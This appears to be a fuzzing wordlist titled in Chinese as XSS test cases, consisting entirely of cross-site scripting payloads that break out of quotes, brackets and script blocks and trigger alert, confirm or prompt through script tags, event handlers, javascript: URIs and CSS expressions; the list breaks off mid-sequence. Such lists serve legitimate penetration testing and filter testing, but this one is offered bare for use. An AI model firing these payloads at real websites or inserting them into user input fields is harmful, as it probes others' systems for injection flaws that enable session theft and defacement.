xss测试用例

alert(1)//
'alert(1)//
'>alert(1)//
>alert(1)//
"alert(1)//
">alert(1)//
alert(1)
alert(1)
confirm(1)//
'confirm(1)//
'>confirm(1)//
>confirm(1)//
"confirm(1)//
">confirm(1)//
confirm(1)
confirm(1)
prompt(1)//
'prompt(1)//
'>prompt(1)//
>prompt(1)//
"prompt(1)//
">prompt(1)//
prompt(1)
prompt(1)
)alert(1)//
')alert(1)//
'>)alert(1)//
>)alert(1)//
")alert(1)//
">)alert(1)//
)alert(1)
)alert(1)
)confirm(1)//
')confirm(1)//
'>)confirm(1)//
>)confirm(1)//
")confirm(1)//
">)confirm(1)//
)confirm(1)
)confirm(1)
)prompt(1)//
')prompt(1)//
'>)prompt(1)//
>)prompt(1)//
")prompt(1)//
">)prompt(1)//
)prompt(1)
)prompt(1)
;alert(1)//
';alert(1)//
'>;alert(1)//
>;alert(1)//
";alert(1)//
">;alert(1)//
;alert(1)
;alert(1)
;confirm(1)//
';confirm(1)//
'>;confirm(1)//
>;confirm(1)//
";confirm(1)//
">;confirm(1)//
;confirm(1)
;confirm(1)
;prompt(1)//
';prompt(1)//
'>;prompt(1)//
>;prompt(1)//
";prompt(1)//
">;prompt(1)//
;prompt(1)
;prompt(1)
alert(1);//
'alert(1);//
'>alert(1);//
>alert(1);//
"alert(1);//
">alert(1);//
alert(1);
alert(1);
confirm(1);//
'confirm(1);//
'>confirm(1);//
>confirm(1);//
"confirm(1);//
">confirm(1);//
confirm(1);
confirm(1);
prompt(1);//
'prompt(1);//
'>prompt(1);//
>prompt(1);//
"prompt(1);//
">prompt(1);//
prompt(1);
prompt(1);
;alert(1);//
';alert(1);//
'>;alert(1);//
>;alert(1);//
";alert(1);//
">;alert(1);//
;alert(1);
;alert(1);
;confirm(1);//
';confirm(1);//
'>;confirm(1);//
>;confirm(1);//
";confirm(1);//
">;confirm(1);//
;confirm(1);
;confirm(1);
;prompt(1);//
';prompt(1);//
'>;prompt(1);//
>;prompt(1);//
";prompt(1);//
">;prompt(1);//
;prompt(1);
;prompt(1);
);alert(1)//
');alert(1)//
'>);alert(1)//
>);alert(1)//
");alert(1)//
">);alert(1)//
);alert(1)
);alert(1)
);confirm(1)//
');confirm(1)//
'>);confirm(1)//
>);confirm(1)//
");confirm(1)//
">);confirm(1)//
);confirm(1)
);confirm(1)
);prompt(1)//
');prompt(1)//
'>);prompt(1)//
>);prompt(1)//
");prompt(1)//
">);prompt(1)//
);prompt(1)
);prompt(1)
);alert(1);//
');alert(1);//
'>);alert(1);//
>);alert(1);//
");alert(1);//
">);alert(1);//
);alert(1);
);alert(1);
);confirm(1);//
');confirm(1);//
'>);confirm(1);//
>);confirm(1);//
");confirm(1);//
">);confirm(1);//
);confirm(1);
);confirm(1);
);prompt(1);//
');prompt(1);//
'>);prompt(1);//
>);prompt(1);//
");prompt(1);//
">);prompt(1);//
);prompt(1);
);prompt(1);
});alert(1)//
'});alert(1)//
'>});alert(1)//
>});alert(1)//
"});alert(1)//
">});alert(1)//
});alert(1)
});alert(1)
});confirm(1)//
'});confirm(1)//
'>});confirm(1)//
>});confirm(1)//
"});confirm(1)//
">});confirm(1)//
});confirm(1)
});confirm(1)
});prompt(1)//
'});prompt(1)//
'>});prompt(1)//
>});prompt(1)//
"});prompt(1)//
">});prompt(1)//
});prompt(1)
});prompt(1)
});alert(1);//
'});alert(1);//
'>});alert(1);//
>});alert(1);//
"});alert(1);//
">});alert(1);//
});alert(1);
});alert(1);
});confirm(1);//
'});confirm(1);//
'>});confirm(1);//
>});confirm(1);//
"});confirm(1);//
">});confirm(1);//
});confirm(1);
});confirm(1);
});prompt(1);//
'});prompt(1);//
'>});prompt(1);//
>});prompt(1);//
"});prompt(1);//
">});prompt(1);//
});prompt(1);
});prompt(1);
}});alert(1)//
'}});alert(1)//
'>}});alert(1)//
>}});alert(1)//
"}});alert(1)//
">}});alert(1)//
}});alert(1)
}});alert(1)
}});confirm(1)//
'}});confirm(1)//
'>}});confirm(1)//
>}});confirm(1)//
"}});confirm(1)//
">}});confirm(1)//
}});confirm(1)
}});confirm(1)
}});prompt(1)//
'}});prompt(1)//
'>}});prompt(1)//
>}});prompt(1)//
"}});prompt(1)//
">}});prompt(1)//
}});prompt(1)
}});prompt(1)
}});alert(1);//
'}});alert(1);//
'>}});alert(1);//
>}});alert(1);//
"}});alert(1);//
">}});alert(1);//
}});alert(1);
}});alert(1);
}});confirm(1);//
'}});confirm(1);//
'>}});confirm(1);//
>}});confirm(1);//
"}});confirm(1);//
">}});confirm(1);//
}});confirm(1);
}});confirm(1);
}});prompt(1);//
'}});prompt(1);//
'>}});prompt(1);//
>}});prompt(1);//
"}});prompt(1);//
">}});prompt(1);//
}});prompt(1);
}});prompt(1);
alert(1)</script>//
'alert(1)</script>//
'>alert(1)</script>//
>alert(1)</script>//
"alert(1)</script>//
">alert(1)</script>//
alert(1)</script>
alert(1)</script>
confirm(1)</script>//
'confirm(1)</script>//
'>confirm(1)</script>//
>confirm(1)</script>//
"confirm(1)</script>//
">confirm(1)</script>//
confirm(1)</script>
confirm(1)</script>
prompt(1)</script>//
'prompt(1)</script>//
'>prompt(1)</script>//
>prompt(1)</script>//
"prompt(1)</script>//
">prompt(1)</script>//
prompt(1)</script>
prompt(1)</script>
)alert(1)</script>//
')alert(1)</script>//
'>)alert(1)</script>//
>)alert(1)</script>//
")alert(1)</script>//
">)alert(1)</script>//
)alert(1)</script>
)alert(1)</script>
)confirm(1)</script>//
')confirm(1)</script>//
'>)confirm(1)</script>//
>)confirm(1)</script>//
")confirm(1)</script>//
">)confirm(1)</script>//
)confirm(1)</script>
)confirm(1)</script>
)prompt(1)</script>//
')prompt(1)</script>//
'>)prompt(1)</script>//
>)prompt(1)</script>//
")prompt(1)</script>//
">)prompt(1)</script>//
)prompt(1)</script>
)prompt(1)</script>
;alert(1)</script>//
';alert(1)</script>//
'>;alert(1)</script>//
>;alert(1)</script>//
";alert(1)</script>//
">;alert(1)</script>//
;alert(1)</script>
;alert(1)</script>
;confirm(1)</script>//
';confirm(1)</script>//
'>;confirm(1)</script>//
>;confirm(1)</script>//
";confirm(1)</script>//
">;confirm(1)</script>//
;confirm(1)</script>
;confirm(1)</script>
;prompt(1)</script>//
';prompt(1)</script>//
'>;prompt(1)</script>//
>;prompt(1)</script>//
";prompt(1)</script>//
">;prompt(1)</script>//
;prompt(1)</script>
;prompt(1)</script>
alert(1);</script>//
'alert(1);</script>//
'>alert(1);</script>//
>alert(1);</script>//
"alert(1);</script>//
">alert(1);</script>//
alert(1);</script>
alert(1);</script>
confirm(1);</script>//
'confirm(1);</script>//
'>confirm(1);</script>//
>confirm(1);</script>//
"confirm(1);</script>//
">confirm(1);</script>//
confirm(1);</script>
confirm(1);</script>
prompt(1);</script>//
'prompt(1);</script>//
'>prompt(1);</script>//
>prompt(1);</script>//
"prompt(1);</script>//
">prompt(1);</script>//
prompt(1);</script>
prompt(1);</script>
;alert(1);</script>//
';alert(1);</script>//
'>;alert(1);</script>//
>;alert(1);</script>//
";alert(1);</script>//
">;alert(1);</script>//
;alert(1);</script>
;alert(1);</script>
;confirm(1);</script>//
';confirm(1);</script>//
'>;confirm(1);</script>//
>;confirm(1);</script>//
";confirm(1);</script>//
">;confirm(1);</script>//
;confirm(1);</script>
;confirm(1);</script>
;prompt(1);</script>//
';prompt(1);</script>//
'>;prompt(1);</script>//
>;prompt(1);</script>//
";prompt(1);</script>//
">;prompt(1);</script>//
;prompt(1);</script>
;prompt(1);</script>
);alert(1)</script>//
');alert(1)</script>//
'>);alert(1)</script>//
>);alert(1)</script>//
");alert(1)</script>//
">);alert(1)</script>//
);alert(1)</script>
);alert(1)</script>
);confirm(1)</script>//
');confirm(1)</script>//
'>);confirm(1)</script>//
>);confirm(1)</script>//
");confirm(1)</script>//
">);confirm(1)</script>//
);confirm(1)</script>
);confirm(1)</script>
);prompt(1)</script>//
');prompt(1)</script>//
'>);prompt(1)</script>//
>);prompt(1)</script>//
");prompt(1)</script>//
">);prompt(1)</script>//
);prompt(1)</script>
);prompt(1)</script>
);alert(1);</script>//
');alert(1);</script>//
'>);alert(1);</script>//
>);alert(1);</script>//
");alert(1);</script>//
">);alert(1);</script>//
);alert(1);</script>
);alert(1);</script>
);confirm(1);</script>//
');confirm(1);</script>//
'>);confirm(1);</script>//
>);confirm(1);</script>//
");confirm(1);</script>//
">);confirm(1);</script>//
);confirm(1);</script>
);confirm(1);</script>
);prompt(1);</script>//
');prompt(1);</script>//
'>);prompt(1);</script>//
>);prompt(1);</script>//
");prompt(1);</script>//
">);prompt(1);</script>//
);prompt(1);</script>
);prompt(1);</script>
});alert(1)</script>//
'});alert(1)</script>//
'>});alert(1)</script>//
>});alert(1)</script>//
"});alert(1)</script>//
">});alert(1)</script>//
});alert(1)</script>
});alert(1)</script>
});confirm(1)</script>//
'});confirm(1)</script>//
'>});confirm(1)</script>//
>});confirm(1)</script>//
"});confirm(1)</script>//
">});confirm(1)</script>//
});confirm(1)</script>
});confirm(1)</script>
});prompt(1)</script>//
'});prompt(1)</script>//
'>});prompt(1)</script>//
>});prompt(1)</script>//
"});prompt(1)</script>//
">});prompt(1)</script>//
});prompt(1)</script>
});prompt(1)</script>
});alert(1);</script>//
'});alert(1);</script>//
'>});alert(1);</script>//
>});alert(1);</script>//
"});alert(1);</script>//
">});alert(1);</script>//
});alert(1);</script>
});alert(1);</script>
});confirm(1);</script>//
'});confirm(1);</script>//
'>});confirm(1);</script>//
>});confirm(1);</script>//
"});confirm(1);</script>//
">});confirm(1);</script>//
});confirm(1);</script>
});confirm(1);</script>
});prompt(1);</script>//
'});prompt(1);</script>//
'>});prompt(1);</script>//
>});prompt(1);</script>//
"});prompt(1);</script>//
">});prompt(1);</script>//
});prompt(1);</script>
});prompt(1);</script>
}});alert(1)</script>//
'}});alert(1)</script>//
'>}});alert(1)</script>//
>}});alert(1)</script>//
"}});alert(1)</script>//
">}});alert(1)</script>//
}});alert(1)</script>
}});alert(1)</script>
}});confirm(1)</script>//
'}});confirm(1)</script>//
'>}});confirm(1)</script>//
>}});confirm(1)</script>//
"}});confirm(1)</script>//
">}});confirm(1)</script>//
}});confirm(1)</script>
}});confirm(1)</script>
}});prompt(1)</script>//
'}});prompt(1)</script>//
'>}});prompt(1)</script>//
>}});prompt(1)</script>//
"}});prompt(1)</script>//
">}});prompt(1)</script>//
}});prompt(1)</script>
}});prompt(1)</script>
}});alert(1);</script>//
'}});alert(1);</script>//
'>}});alert(1);</script>//
>}});alert(1);</script>//
"}});alert(1);</script>//
">}});alert(1);</script>//
}});alert(1);</script>
}});alert(1);</script>
}});confirm(1);</script>//
'}});confirm(1);</script>//
'>}});confirm(1);</script>//
>}});confirm(1);</script>//
"}});confirm(1);</script>//
">}});confirm(1);</script>//
}});confirm(1);</script>
}});confirm(1);</script>
}});prompt(1);</script>//
'}});prompt(1);</script>//
'>}});prompt(1);</script>//
>}});prompt(1);</script>//
"}});prompt(1);</script>//
">}});prompt(1);</script>//
}});prompt(1);</script>
}});prompt(1);</script>
</script><script>alert(1);</script><script>//
'</script><script>alert(1);</script><script>//
'></script><script>alert(1);</script><script>//
></script><script>alert(1);</script><script>//
"</script><script>alert(1);</script><script>//
"></script><script>alert(1);</script><script>//
</script><script>alert(1);</script><script>
</script><script>alert(1);</script><script>
</script><script>confirm(1);</script><script>//
'</script><script>confirm(1);</script><script>//
'></script><script>confirm(1);</script><script>//
></script><script>confirm(1);</script><script>//
"</script><script>confirm(1);</script><script>//
"></script><script>confirm(1);</script><script>//
</script><script>confirm(1);</script><script>
</script><script>confirm(1);</script><script>
</script><script>prompt(1);</script><script>//
'</script><script>prompt(1);</script><script>//
'></script><script>prompt(1);</script><script>//
></script><script>prompt(1);</script><script>//
"</script><script>prompt(1);</script><script>//
"></script><script>prompt(1);</script><script>//
</script><script>prompt(1);</script><script>
</script><script>prompt(1);</script><script>
onmouseover ="alert(1)//
'onmouseover ="alert(1)//
'>onmouseover ="alert(1)//
>onmouseover ="alert(1)//
"onmouseover ="alert(1)//
">onmouseover ="alert(1)//
onmouseover ="alert(1)
onmouseover =alert(1)
onmouseover ="confirm(1)//
'onmouseover ="confirm(1)//
'>onmouseover ="confirm(1)//
>onmouseover ="confirm(1)//
"onmouseover ="confirm(1)//
">onmouseover ="confirm(1)//
onmouseover ="confirm(1)
onmouseover =confirm(1)
onmouseover ="prompt(1)//
'onmouseover ="prompt(1)//
'>onmouseover ="prompt(1)//
>onmouseover ="prompt(1)//
"onmouseover ="prompt(1)//
">onmouseover ="prompt(1)//
onmouseover ="prompt(1)
onmouseover =prompt(1)
onclick ="alert(1)//
'onclick ="alert(1)//
'>onclick ="alert(1)//
>onclick ="alert(1)//
"onclick ="alert(1)//
">onclick ="alert(1)//
onclick ="alert(1)
onclick =alert(1)
onclick ="confirm(1)//
'onclick ="confirm(1)//
'>onclick ="confirm(1)//
>onclick ="confirm(1)//
"onclick ="confirm(1)//
">onclick ="confirm(1)//
onclick ="confirm(1)
onclick =confirm(1)
onclick ="prompt(1)//
'onclick ="prompt(1)//
'>onclick ="prompt(1)//
>onclick ="prompt(1)//
"onclick ="prompt(1)//
">onclick ="prompt(1)//
onclick ="prompt(1)
onclick =prompt(1)
onfocus ="alert(1)//
'onfocus ="alert(1)//
'>onfocus ="alert(1)//
>onfocus ="alert(1)//
"onfocus ="alert(1)//
">onfocus ="alert(1)//
onfocus ="alert(1)
onfocus =alert(1)
onfocus ="confirm(1)//
'onfocus ="confirm(1)//
'>onfocus ="confirm(1)//
>onfocus ="confirm(1)//
"onfocus ="confirm(1)//
">onfocus ="confirm(1)//
onfocus ="confirm(1)
onfocus =confirm(1)
onfocus ="prompt(1)//
'onfocus ="prompt(1)//
'>onfocus ="prompt(1)//
>onfocus ="prompt(1)//
"onfocus ="prompt(1)//
">onfocus ="prompt(1)//
onfocus ="prompt(1)
onfocus =prompt(1)
<script>alert(1)</script>//
'<script>alert(1)</script>//
'><script>alert(1)</script>//
><script>alert(1)</script>//
"<script>alert(1)</script>//
"><script>alert(1)</script>//
<script>alert(1)</script>
<script>alert(1)</script>
<script>confirm(1)</script>//
'<script>confirm(1)</script>//
'><script>confirm(1)</script>//
><script>confirm(1)</script>//
"<script>confirm(1)</script>//
"><script>confirm(1)</script>//
<script>confirm(1)</script>
<script>confirm(1)</script>
<script>prompt(1)</script>//
'<script>prompt(1)</script>//
'><script>prompt(1)</script>//
><script>prompt(1)</script>//
"<script>prompt(1)</script>//
"><script>prompt(1)</script>//
<script>prompt(1)</script>
<script>prompt(1)</script>
</script>">'><script>alert(1)</script>//
'</script>">'><script>alert(1)</script>//
'></script>">'><script>alert(1)</script>//
></script>">'><script>alert(1)</script>//
"</script>">'><script>alert(1)</script>//
"></script>">'><script>alert(1)</script>//
</script>">`><script>alert(1)</script>
</script>>><script>alert(1)</script>
</script>">'><script>confirm(1)</script>//
'</script>">'><script>confirm(1)</script>//
'></script>">'><script>confirm(1)</script>//
></script>">'><script>confirm(1)</script>//
"</script>">'><script>confirm(1)</script>//
"></script>">'><script>confirm(1)</script>//
</script>">`><script>confirm(1)</script>
</script>>><script>confirm(1)</script>
</script>">'><script>prompt(1)</script>//
'</script>">'><script>prompt(1)</script>//
'></script>">'><script>prompt(1)</script>//
></script>">'><script>prompt(1)</script>//
"</script>">'><script>prompt(1)</script>//
"></script>">'><script>prompt(1)</script>//
</script>">`><script>prompt(1)</script>
</script>>><script>prompt(1)</script>
<img src=x onerror=alert(1);>//
'<img src=x onerror=alert(1);>//
'><img src=x onerror=alert(1);>//
><img src=x onerror=alert(1);>//
"<img src=x onerror=alert(1);>//
"><img src=x onerror=alert(1);>//
<img src=x onerror=alert(1);>
<img src=x onerror=alert(1);>
<img src=x onerror=confirm(1);>//
'<img src=x onerror=confirm(1);>//
'><img src=x onerror=confirm(1);>//
><img src=x onerror=confirm(1);>//
"<img src=x onerror=confirm(1);>//
"><img src=x onerror=confirm(1);>//
<img src=x onerror=confirm(1);>
<img src=x onerror=confirm(1);>
<img src=x onerror=prompt(1);>//
'<img src=x onerror=prompt(1);>//
'><img src=x onerror=prompt(1);>//
><img src=x onerror=prompt(1);>//
"<img src=x onerror=prompt(1);>//
"><img src=x onerror=prompt(1);>//
<img src=x onerror=prompt(1);>
<img src=x onerror=prompt(1);>
<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
'<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
'><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
"<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
"><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>
<img src=http://www.w3school.com.cn/ui/head_index.gif onload=alert(1);>
<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
'<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
'><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
"<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
"><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>
<img src=http://www.w3school.com.cn/ui/head_index.gif onload=confirm(1);>
<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
'<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
'><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
"<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
"><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
<img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>
<img src=http://www.w3school.com.cn/ui/head_index.gif onload=prompt(1);>
<img src '//"%0Aonerror=alert(1)>//
'<img src '//"%0Aonerror=alert(1)>//
'><img src '//"%0Aonerror=alert(1)>//
><img src '//"%0Aonerror=alert(1)>//
"<img src '//"%0Aonerror=alert(1)>//
"><img src '//"%0Aonerror=alert(1)>//
<img src `//"%0Aonerror=alert(1)>
<img src //%0Aonerror=alert(1)>
<img src '//"%0Aonerror=confirm(1)>//
'<img src '//"%0Aonerror=confirm(1)>//
'><img src '//"%0Aonerror=confirm(1)>//
><img src '//"%0Aonerror=confirm(1)>//
"<img src '//"%0Aonerror=confirm(1)>//
"><img src '//"%0Aonerror=confirm(1)>//
<img src `//"%0Aonerror=confirm(1)>
<img src //%0Aonerror=confirm(1)>
<img src '//"%0Aonerror=prompt(1)>//
'<img src '//"%0Aonerror=prompt(1)>//
'><img src '//"%0Aonerror=prompt(1)>//
><img src '//"%0Aonerror=prompt(1)>//
"<img src '//"%0Aonerror=prompt(1)>//
"><img src '//"%0Aonerror=prompt(1)>//
<img src `//"%0Aonerror=prompt(1)>
<img src //%0Aonerror=prompt(1)>
<img src ?itworksonchrome?/onerror = alert(1)>//
'<img src ?itworksonchrome?/onerror = alert(1)>//
'><img src ?itworksonchrome?/onerror = alert(1)>//
><img src ?itworksonchrome?/onerror = alert(1)>//
"<img src ?itworksonchrome?/onerror = alert(1)>//
"><img src ?itworksonchrome?/onerror = alert(1)>//
<img src ?itworksonchrome?/onerror = alert(1)>
<img src ?itworksonchrome?/onerror = alert(1)>
<img src ?itworksonchrome?/onerror = confirm(1)>//
'<img src ?itworksonchrome?/onerror = confirm(1)>//
'><img src ?itworksonchrome?/onerror = confirm(1)>//
><img src ?itworksonchrome?/onerror = confirm(1)>//
"<img src ?itworksonchrome?/onerror = confirm(1)>//
"><img src ?itworksonchrome?/onerror = confirm(1)>//
<img src ?itworksonchrome?/onerror = confirm(1)>
<img src ?itworksonchrome?/onerror = confirm(1)>
<img src ?itworksonchrome?/onerror = prompt(1)>//
'<img src ?itworksonchrome?/onerror = prompt(1)>//
'><img src ?itworksonchrome?/onerror = prompt(1)>//
><img src ?itworksonchrome?/onerror = prompt(1)>//
"<img src ?itworksonchrome?/onerror = prompt(1)>//
"><img src ?itworksonchrome?/onerror = prompt(1)>//
<img src ?itworksonchrome?/onerror = prompt(1)>
<img src ?itworksonchrome?/onerror = prompt(1)>
<img '//"%0Aonerror=alert(1)// src=1>//
'<img '//"%0Aonerror=alert(1)// src=1>//
'><img '//"%0Aonerror=alert(1)// src=1>//
><img '//"%0Aonerror=alert(1)// src=1>//
"<img '//"%0Aonerror=alert(1)// src=1>//
"><img '//"%0Aonerror=alert(1)// src=1>//
<img `//"%0Aonerror=alert(1)// src=1>
<img //%0Aonerror=alert(1)// src=1>
<img '//"%0Aonerror=confirm(1)// src=1>//
'<img '//"%0Aonerror=confirm(1)// src=1>//
'><img '//"%0Aonerror=confirm(1)// src=1>//
><img '//"%0Aonerror=confirm(1)// src=1>//
"<img '//"%0Aonerror=confirm(1)// src=1>//
"><img '//"%0Aonerror=confirm(1)// src=1>//
<img `//"%0Aonerror=confirm(1)// src=1>
<img //%0Aonerror=confirm(1)// src=1>
<img '//"%0Aonerror=prompt(1)// src=1>//
'<img '//"%0Aonerror=prompt(1)// src=1>//
'><img '//"%0Aonerror=prompt(1)// src=1>//
><img '//"%0Aonerror=prompt(1)// src=1>//
"<img '//"%0Aonerror=prompt(1)// src=1>//
"><img '//"%0Aonerror=prompt(1)// src=1>//
<img `//"%0Aonerror=prompt(1)// src=1>
<img //%0Aonerror=prompt(1)// src=1>
<img style="xss:expression(alert(1))">//
'<img style="xss:expression(alert(1))">//
'><img style="xss:expression(alert(1))">//
><img style="xss:expression(alert(1))">//
"<img style="xss:expression(alert(1))">//
"><img style="xss:expression(alert(1))">//
<img style="xss:expression(alert(1))">
<img style=xss:expression(alert(1))>
<img style="xss:expression(confirm(1))">//
'<img style="xss:expression(confirm(1))">//
'><img style="xss:expression(confirm(1))">//
><img style="xss:expression(confirm(1))">//
"<img style="xss:expression(confirm(1))">//
"><img style="xss:expression(confirm(1))">//
<img style="xss:expression(confirm(1))">
<img style=xss:expression(confirm(1))>
<img style="xss:expression(prompt(1))">//
'<img style="xss:expression(prompt(1))">//
'><img style="xss:expression(prompt(1))">//
><img style="xss:expression(prompt(1))">//
"<img style="xss:expression(prompt(1))">//
"><img style="xss:expression(prompt(1))">//
<img style="xss:expression(prompt(1))">
<img style=xss:expression(prompt(1))>
</script><img src="javascript:alert(1);">//
'</script><img src="javascript:alert(1);">//
'></script><img src="javascript:alert(1);">//
></script><img src="javascript:alert(1);">//
"</script><img src="javascript:alert(1);">//
"></script><img src="javascript:alert(1);">//
</script><img src="javascript:alert(1);">
</script><img src=javascript:alert(1);>
</script><img src="javascript:confirm(1);">//
'</script><img src="javascript:confirm(1);">//
'></script><img src="javascript:confirm(1);">//
></script><img src="javascript:confirm(1);">//
"</script><img src="javascript:confirm(1);">//
"></script><img src="javascript:confirm(1);">//
</script><img src="javascript:confirm(1);">
</script><img src=javascript:confirm(1);>
</script><img src="javascript:prompt(1);">//
'</script><img src="javascript:prompt(1);">//
'></script><img src="javascript:prompt(1);">//
></script><img src="javascript:prompt(1);">//
"</script><img src="javascript:prompt(1);">//
"></script><img src="javascript:prompt(1);">//
</script><img src="javascript:prompt(1);">
</script><img src=javascript:prompt(1);>
</script><img src=x onerror=alert(1);>//
'</script><img src=x onerror=alert(1);>//
'></script><img src=x onerror=alert(1);>//
></script><img src=x onerror=alert(1);>//
"</script><img src=x onerror=alert(1);>//
"></script><img src=x onerror=alert(1);>//
</script><img src=x onerror=alert(1);>
</script><img src=x onerror=alert(1);>
</script><img src=x onerror=confirm(1);>//
'</script><img src=x onerror=confirm(1);>//
'></script><img src=x onerror=confirm(1);>//
></script><img src=x onerror=confirm(1);>//
"</script><img src=x onerror=confirm(1);>//
"></script><img src=x onerror=confirm(1);>//
</script><img src=x onerror=confirm(1);>
</script><img src=x onerror=confirm(1);>
</script><img src=x onerror=prompt(1);>//
'</script><img src=x onerror=prompt(1);>//
'></script><img src=x onerror=prompt(1);>//
></script><img src=x onerror=prompt(1);>//
"</script><img src=x onerror=prompt(1);>//
"></script><img src=x onerror=prompt(1);>//
</script><img src=x onerror=prompt(1);>
</script><img src=x onerror=prompt(1);>
</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
'</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
'></script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
></script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
"</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
"></script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>//
</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=alert(1);>
</script><img src=http://www.w3school.com.cn/ui/head_index.gif onload=alert(1);>
</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
'</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
'></script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
></script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
"</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
"></script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>//
</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=confirm(1);>
</script><img src=http://www.w3school.com.cn/ui/head_index.gif onload=confirm(1);>
</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
'</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
'></script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
></script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
"</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
"></script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>//
</script><img src="http://www.w3school.com.cn/ui/head_index.gif" onload=prompt(1);>
</script><img src=http://www.w3school.com.cn/ui/head_index.gif onload=prompt(1);>
</script><img src '//"%0Aonerror=alert(1)>//
'</script><img src '//"%0Aonerror=alert(1)>//
'></script><img src '//"%0Aonerror=alert(1)>//
></script><img src '//"%0Aonerror=alert(1)>//
"</script><img src '//"%0Aonerror=alert(1)>//
"></script><img src '//"%0Aonerror=alert(1)>//
</script><img src `//"%0Aonerror=alert(1)>
</script><img src //%0Aonerror=alert(1)>
</script><img src '//"%0Aonerror=confirm(1)>//
'</script><img src '//"%0Aonerror=confirm(1)>//
'></script><img src '//"%0Aonerror=confirm(1)>//
></script><img src '//"%0Aonerror=confirm(1)>//
"</script><img src '//"%0Aonerror=confirm(1)>//
"></script><img src '//"%0Aonerror=confirm(1)>//
</script><img src `//"%0Aonerror=confirm(1)>
</script><img src //%0Aonerror=confirm(1)>
</script><img src '//"%0Aonerror=prompt(1)>//
'</script><img src '//"%0Aonerror=prompt(1)>//
'></script><img src '//"%0Aonerror=prompt(1)>//
></script><img src '//"%0Aonerror=prompt(1)>//
"</script><img src '//"%0Aonerror=prompt(1)>//
"></script><img src '//"%0Aonerror=prompt(1)>//
</script><img src `//"%0Aonerror=prompt(1)>
</script><img src //%0Aonerror=prompt(1)>
</script><img src ?itworksonchrome?/onerror = alert(1)>//
'</script><img src ?itworksonchrome?/onerror = alert(1)>//
'></script><img src ?itworksonchrome?/onerror = alert(1)>//
></script><img src ?itworksonchrome?/onerror = alert(1)>//
"</script><img src ?itworksonchrome?/onerror = alert(1)>//
"></script><img src ?itworksonchrome?/onerror = alert(1)>//
</script><img src ?itworksonchrome?/onerror = alert(1)>
</script><img src ?itworksonchrome?/onerror = alert(1)>
</script><img src ?itworksonchrome?/onerror = confirm(1)>//
'</script><img src ?itworksonchrome?/onerror = confirm(1)>//
'></script><img src ?itworksonchrome?/onerror = confirm(1)>//
></script><img src ?itworksonchrome?/onerror = confirm(1)>//
"</script><img src ?itworksonchrome?/onerror = confirm(1)>//
"></script><img src ?itworksonchrome?/onerror = confirm(1)>//
</script><img src ?itworksonchrome?/onerror = confirm(1)>
</script><img src ?itworksonchrome?/onerror = confirm(1)>
</script><img src ?itworksonchrome?/onerror = prompt(1)>//
'</script><img src ?itworksonchrome?/onerror = prompt(1)>//
'></script><img src ?itworksonchrome?/onerror = prompt(1)>//
></script><img src ?itworksonchrome?/onerror = prompt(1)>//
"</script><img src ?itworksonchrome?/onerror = prompt(1)>//
"></script><img src ?itworksonchrome?/onerror = prompt(1)>//
</script><img src ?itworksonchrome?/onerror = prompt(1)>
</script><img src ?itworksonchrome?/onerror = prompt(1)>
</script><img '//"%0Aonerror=alert(1)// src=1>//
'</script><img '//"%0Aonerror=alert(1)// src=1>//
'></script><img '//"%0Aonerror=alert(1)// src=1>//
></script><img '//"%0Aonerror=alert(1)// src=1>//
"</script><img '//"%0Aonerror=alert(1)// src=1>//
"></script><img '//"%0Aonerror=alert(1)// src=1>//
</script><img `//"%0Aonerror=alert(1)// src=1>
</script><img //%0Aonerror=alert(1)// src=1>
</script><img '//"%0Aonerror=confirm(1)// src=1>//
'</script><img '//"%0Aonerror=confirm(1)// src=1>//
'></script><img '//"%0Aonerror=confirm(1)// src=1>//
></script><img '//"%0Aonerror=confirm(1)// src=1>//
"</script><img '//"%0Aonerror=confirm(1)// src=1>//
